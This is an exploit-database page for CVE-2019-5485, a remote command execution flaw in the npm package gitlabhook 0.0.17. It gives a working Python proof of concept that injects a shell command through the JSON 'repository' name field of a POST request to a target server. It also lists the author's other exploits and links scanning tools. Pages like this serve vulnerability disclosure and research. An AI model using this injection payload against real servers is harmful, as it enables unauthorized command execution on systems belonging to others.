Search for hundreds of thousands of exploits

"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution"

Author

Exploit author

"Semen Alexandrovich Lyhin"

Platform

Exploit platform

json

Release date

Exploit published date

2019-09-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."
Release DateTitleTypePlatformAuthor
2019-10-01"DotNetNuke 9.3.2 - Cross-Site Scripting"webappsmultiple"Semen Alexandrovich Lyhin"
2019-09-26"inoERP 4.15 - 'download' SQL Injection"webappsphp"Semen Alexandrovich Lyhin"
2019-09-25"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution"webappsjson"Semen Alexandrovich Lyhin"
2019-06-20"WebERP 4.15 - SQL injection"webappsphp"Semen Alexandrovich Lyhin"
2019-04-10"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting"webappshardware"Semen Alexandrovich Lyhin"
2018-11-13"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)"localwindows"Semen Alexandrovich Lyhin"
2018-11-06"Arm Whois 3.11 - Buffer Overflow (SEH)"localwindows_x86"Semen Alexandrovich Lyhin"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47420/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.